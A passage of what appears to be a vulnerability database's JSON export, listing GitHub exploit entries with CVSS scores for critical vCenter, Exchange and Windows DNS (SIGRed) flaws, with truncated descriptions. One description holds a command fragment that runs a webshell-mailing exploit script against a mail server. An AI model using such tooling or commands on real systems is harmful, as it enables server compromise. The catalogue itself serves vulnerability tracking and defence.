Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-12-27T05:40:13", "id": "502CC8C9-71B8-5BB1-9D39-D1EAA861ABDA", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:18:01", "description": "**vsphereyeeter.sh** is an automated bash script to exploit vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T18:22:34", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-08-27T21:28:19", "id": "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:56:39", "description": "**vsphereyeeter.sh** is an automated bash script to exploit vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-22T14:00:38", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-07-21T20:14:22", "id": "0D23F068-44DE-5104-B4F1-A0E53C83D60F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:06:27", "description": "### VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972\n\n**zoomeye do...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T07:17:21", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-08-15T15:41:26", "id": "6BCA07B7-CE6D-5F8C-9F75-D9C7E4B072FE", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-02T19:16:56", "description": "# CVE-2021-34473-NMAP-SCANNER\nA massive scanner for CVE-2021-344...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-16T08:22:29", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2023-05-06T05:33:04", "id": "2BEFA353-947D-5B41-AE38-EDB0C71B5B44", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-10T07:09:52", "description": "# CVE-2021-34473\nCVE-2021-34473 Microsoft Exchange Server Remote...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-16T11:27:13", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2022-08-10T06:53:56", "id": "4AC49DB9-A784-561B-BF92-94209310B51B", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-02T15:49:42", "description": "- python send_webshell_mail.py https://mail16.echod.com aaa@echo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T07:47:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2023-09-28T11:33:26", "id": "0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:50:46", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T09:28:17", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-02-26T01:57:28", "id": "6B607D21-8F2D-50F9-8E60-BC95F2E252E1", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-02T18:43:15", "description": "# CVE-2021-21972\nCVE-2021-21972\n\n\n# Works On\n\n- VMware-VCSA-all-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T11:14:58", "type": "githubexploit", "title": "Exploit for Path Traversal in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2023-11-27T08:08:16", "id": "39EADA2B-CE50-555B-910E-D3B77640C464", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-02T20:07:43", "description": "(CVE-2021-21972) VMware vCenter Server Remote Code Execution Vul...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T11:57:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-05-27T06:52:45", "id": "441AE17C-8A7C-5FB8-AE3C-667A15B0265F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:40", "description": "# CVE-2020-1350\nCVE-2020-1350 Proof-of-Concept\n\nEnvironment Setu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-17T05:41:19", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2022-03-16T16:44:01", "id": "9DE76D04-93D7-5923-9AE3-457D591197D6", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T08:22:16", "description": "# CVE-2020-1350 (SIGRed) - Windows DNS DoS Exploit\n\nCredits for ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-15T23:00:00", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2022-08-18T06:46:01", "id": "FFF6ABA4-7461-5653-836A-79F11037A7FF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T08:21:44", "description": "# Fake_CVE-2020-1350\nThis is the source code for a very crude fa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T21:55:57", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2022-08-18T07:05:31", "id": "37D3D343-97C5-5C12-8595-042E337E31C0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T17:54:35", "description": "This is an educational exercise...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-19T17:32:47", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-10-10T20:39:05", "id": "FB0D7C2A-01EB-5929-A539-96230C17B90F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T17:57:10", "description": "# Overview\n\nMicrosoft announced CVE-2020-1350 on July 14 2020. T...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-15T19:43:39", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-10-10T20:38:31", "id": "DD3676BD-E792-5189-86EE-4765FF68EFCB", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:45", "description": "# [KB4569509: Guidance for DNS Server Vulnerability CVE-2020-135...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-26T02:12:36", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-10-10T20:40:04", "id": "A37C8010-D2C6-52F5-9079-96E8A538B6CA", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-07T02:44:35", "description": "# This is an educational exercise. Use at your own risk.\n\n# CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T19:02:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2022-08-06T02:40:10", "id": "F3CF4A79-402B-56C0-8689-1AF5EBFECF3F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-31T19:43:29", "description": "# CVE-2020-1350\nThis Powershell Script is checking if your serve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-15T05:46:31", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2022-07-31T16:10:52", "id": "93EEDE73-1DB4-5905-BCAB-CDC6F98831CD", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T17:57:01", "description": "# CVE-2020-1350 (AKA SIGRed) v0.30\n\n## Summary: \nA Zeek package...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-15T05:55:20", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2021-01-14T18:47:12", "id": "CB69BCC3-2317-5740-8B01-4F6F0D320AC3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:12:45", "description": "This is a powershell script that'll grab all the AD servers for ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-22T12:11:33", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-10-10T20:40:26", "id": "FA6C0B5A-E89D-54A7-B603-4D8095BF66DD", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T08:22:38", "description": "# cve-2020-1350\nBash Proof-of-Concept (PoC) script to exploit SI...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 